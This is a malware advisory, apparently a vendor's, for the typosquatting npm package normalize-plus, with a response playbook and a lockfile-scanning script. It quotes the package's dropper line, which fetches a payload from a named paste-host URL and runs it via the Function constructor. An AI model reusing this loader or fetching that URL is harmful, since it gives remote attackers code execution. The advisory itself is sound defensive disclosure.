Malicious package

normalize-plus (npm)

Malicious code in normalize-plus (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-6399
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall normalize-plus

What this malware does

On import, normalize-plus's top-level initPlugin() performs an HTTP GET against https://jsonkeeper.com/b/CI3HT, parses the JSON response, and evaluates its cookie field through the Function constructor: const handler = new (Function.constructor)('require', JSON.parse(b).cookie); if (handler) handler(require); (index.js line 74; URL default at line 65). The require symbol is then passed into the dynamically-constructed function, granting the remote payload full Node.js module-loading and filesystem privileges in any consumer that requires this package. jsonkeeper.com is a mutable anonymous paste host, so the maintainer can swap the executed code at any time without republishing the package. The package additionally mimics the API of the widely-used normalize-path package (exporting a normalizePath function) and self-describes as 'Stylus porting of normalize.css', combining a typosquat lure with an import-time remote-code-execution dropper.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

1 flagged: 3.6.6

Indicators of compromise (SHA-256)

68736aa001dbb92a66fb97c6f5592b47bd0bafdcb56a325a4c8595f0b10829c7
a8d9638f9c3f81ac15972cf2ff227b2d426a72c5e37035e54402648fe8120675

Detection & response playbook

Typosquat
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for normalize-plus (version 3.6.6). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging normalize-plus across your stack and pipelines.

  2. If you installed it — respond

    normalize-plus is a typosquat — you almost certainly intended a legitimately-named package. Remove normalize-plus, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.

  3. Did it already run?

    If normalize-plus was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks normalize-plus before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.
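As an added example for step 1 of the playbook (this is not O3 Security's scanner), a small Node.js script that walks a parsed package-lock.json and reports every copy of normalize-plus at the flagged version 3.6.6, handling both lockfileVersion 1 (nested dependencies) and lockfileVersion 2/3 (flat packages keyed by install path). The sample lockfile and its "some-styles" dependency are constructed for the demonstration.

```javascript
// Added example, not O3 Security's scanner: report every copy of normalize-plus
// at the flagged version 3.6.6 in a package-lock.json. Handles lockfileVersion 1
// (nested "dependencies") and lockfileVersion 2/3 (flat "packages" keyed by path).
const FLAGGED_NAME = 'normalize-plus';
const FLAGGED_VERSIONS = new Set(['3.6.6']);

// lockfileVersion 1: recurse through nested dependency trees.
function walkV1(deps, path, hits) {
  for (const [name, entry] of Object.entries(deps || {})) {
    const here = path.concat(name);
    if (name === FLAGGED_NAME && FLAGGED_VERSIONS.has(entry.version)) {
      hits.push({ name, version: entry.version, path: here.join(' > ') });
    }
    walkV1(entry.dependencies, here, hits);
  }
}

// Scan a parsed lockfile object; returns [{ name, version, path }, ...].
function findFlagged(lock) {
  const hits = [];
  if (lock.packages) {
    // v2/v3 keys look like "node_modules/a/node_modules/@s/b"; the package
    // name is everything after the last "node_modules/".
    for (const [key, entry] of Object.entries(lock.packages)) {
      if (key === '') continue; // root project entry, not a dependency
      const name = key.slice(key.lastIndexOf('node_modules/') + 'node_modules/'.length);
      if (name === FLAGGED_NAME && FLAGGED_VERSIONS.has(entry.version)) {
        hits.push({ name, version: entry.version, path: key });
      }
    }
  } else {
    walkV1(lock.dependencies, [], hits);
  }
  return hits;
}

// Constructed sample (v3 shape): the legitimate normalize-path is at the top
// level, while a hypothetical "some-styles" package pulls in the typosquat.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/normalize-path': { version: '3.0.0' },
    'node_modules/some-styles': { version: '0.1.0' },
    'node_modules/some-styles/node_modules/normalize-plus': { version: '3.6.6' },
  },
};

for (const h of findFlagged(SAMPLE_LOCK)) {
  console.log(`FLAGGED ${h.name}@${h.version} at ${h.path}`);
}
```

To run it against a real project, replace SAMPLE_LOCK with JSON.parse of the lockfile contents; a non-empty result means the flagged version is pinned somewhere in the tree.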

Frequently asked questions

No. normalize-plus on npm has been identified as a malicious package (version 3.6.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

GHSA-fr34-v6cp-fc49
IN-MAL-2026-007451

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks normalize-plus-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.
